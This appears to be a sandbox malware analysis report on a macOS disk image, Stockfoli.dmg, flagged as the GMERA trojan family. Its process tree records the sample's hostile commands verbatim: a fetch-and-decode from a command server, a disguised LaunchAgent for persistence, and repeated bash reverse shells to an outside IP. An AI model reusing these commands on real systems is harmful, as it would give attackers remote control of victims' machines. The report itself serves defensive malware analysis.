Analysis

  • max time network
    159s
  • platform
    macos_amd64
  • resource
    macos
  • submitted
    24-06-2021 12:54

General

  • Target

    Stockfoli.dmg

  • Size

    11.2MB

  • MD5

    22a526c0658e542f24358178fb079c38

  • SHA1

    352985598e83b42e99dfcb19636227335a18f8c0

  • SHA256

    118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c

  • SHA512

    73c37880c044235028708e81d840120e78951a5ab4c100338ee958bce2409890a3c9dee75eab95dd8e37e98bd73c4561ff7a3413669527fa5ef458cce26971af

Score
10/10

Malware Config

Signatures

  • GMERA

    GMERA family.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

Processes

  • /bin/sh
    sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"
    1⤵
      PID:552
    • /bin/bash
      sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"
      1⤵
        PID:552
      • /usr/bin/sudo
        sudo open /Volumes/Stockfoli/Stockfoli.app
        1⤵
          PID:552
          • /usr/bin/open
            open /Volumes/Stockfoli/Stockfoli.app
            2⤵
              PID:553
          • /Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli
            /Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli
            1⤵
              PID:554
            • /bin/bash
              /bin/bash -c "nohup sh '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh' </dev/null >/dev/null 2>&1 &"
              1⤵
                PID:562
                • /usr/bin/nohup
                  nohup sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
                  2⤵
                    PID:563
                  • /usr/bin/sh
                    sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
                    2⤵
                      PID:563
                    • /bin/sh
                      sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
                      2⤵
                        PID:563
                      • /bin/bash
                        sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
                        2⤵
                          PID:563
                          • /usr/bin/curl
                            curl -ks "http://owpqkszz.info/link.php?run&91.219.237.21"
                            3⤵
                              PID:585
                            • /usr/bin/base64
                              base64 --decode
                              3⤵
                                PID:587
                              • /bin/cat
                                cat /tmp/.com.apple.upd.plist
                                3⤵
                                  PID:588
                                • /bin/cp
                                  cp /tmp/.com.apple.upd.plist /Users/run/Library/LaunchAgents/.com.apple.upd.plist
                                  3⤵
                                    PID:589
                                  • /bin/cat
                                    cat /Users/run/Library/LaunchAgents/.com.apple.upd.plist
                                    3⤵
                                      PID:590
                                    • /bin/launchctl
                                      launchctl load /tmp/.com.apple.upd.plist
                                      3⤵
                                        PID:591
                                      • /usr/bin/screen
                                        screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
                                        3⤵
                                          PID:596
                                    • /usr/bin/whoami
                                      whoami
                                      1⤵
                                        PID:566
                                      • /usr/bin/tr
                                        tr -dc "[:alnum:].\\r"
                                        1⤵
                                          PID:568
                                        • /usr/bin/tr
                                          tr "[:upper:]" "[:lower:]"
                                          1⤵
                                            PID:569
                                          • /usr/bin/curl
                                            curl -s ipecho.net/plain
                                            1⤵
                                              PID:572
                                            • /bin/bash
                                              /bin/bash -c "nohup '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio' </dev/null >/dev/null 2>&1 &"
                                              1⤵
                                                PID:573
                                                • /usr/bin/nohup
                                                  nohup /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
                                                  2⤵
                                                    PID:574
                                                  • /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
                                                    /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
                                                    2⤵
                                                      PID:574
                                                  • /bin/bash
                                                    /bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25734 0>&1'"
                                                    1⤵
                                                      PID:575
                                                    • /usr/bin/screen
                                                      screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
                                                      1⤵
                                                        PID:575
                                                      • /usr/bin/login
                                                        login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
                                                        1⤵
                                                          PID:577
                                                          • /bin/bash
                                                            bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
                                                            2⤵
                                                              PID:580
                                                              • /bin/bash
                                                                bash -i
                                                                3⤵
                                                                  PID:581
                                                            • /bin/bash
                                                              /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25735 0>&1"
                                                              1⤵
                                                                PID:578
                                                                • /bin/bash
                                                                  bash -i
                                                                  2⤵
                                                                    PID:579
                                                                • /usr/bin/tr
                                                                  tr -dc "[:alnum:].\\r"
                                                                  1⤵
                                                                    PID:583
                                                                  • /usr/bin/tr
                                                                    tr "[:upper:]" "[:lower:]"
                                                                    1⤵
                                                                      PID:584
                                                                    • /bin/launchctl
                                                                      launchctl list
                                                                      1⤵
                                                                        PID:594
                                                                      • /usr/bin/grep
                                                                        grep upd
                                                                        1⤵
                                                                          PID:595
                                                                        • /usr/bin/login
                                                                          login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
                                                                          1⤵
                                                                            PID:601
                                                                            • /bin/bash
                                                                              bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
                                                                              2⤵
                                                                                PID:603
                                                                                • /bin/bash
                                                                                  bash -i
                                                                                  3⤵
                                                                                    PID:604
                                                                              • /bin/bash
                                                                                /bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25736 0>&1'"
                                                                                1⤵
                                                                                  PID:617
                                                                                • /usr/bin/screen
                                                                                  screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
                                                                                  1⤵
                                                                                    PID:617
                                                                                  • /usr/bin/login
                                                                                    login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
                                                                                    1⤵
                                                                                      PID:619
                                                                                      • /bin/bash
                                                                                        bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
                                                                                        2⤵
                                                                                          PID:620
                                                                                          • /bin/bash
                                                                                            bash -i
                                                                                            3⤵
                                                                                              PID:621

                                                                                        Network

                                                                                        MITRE ATT&CK Matrix

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads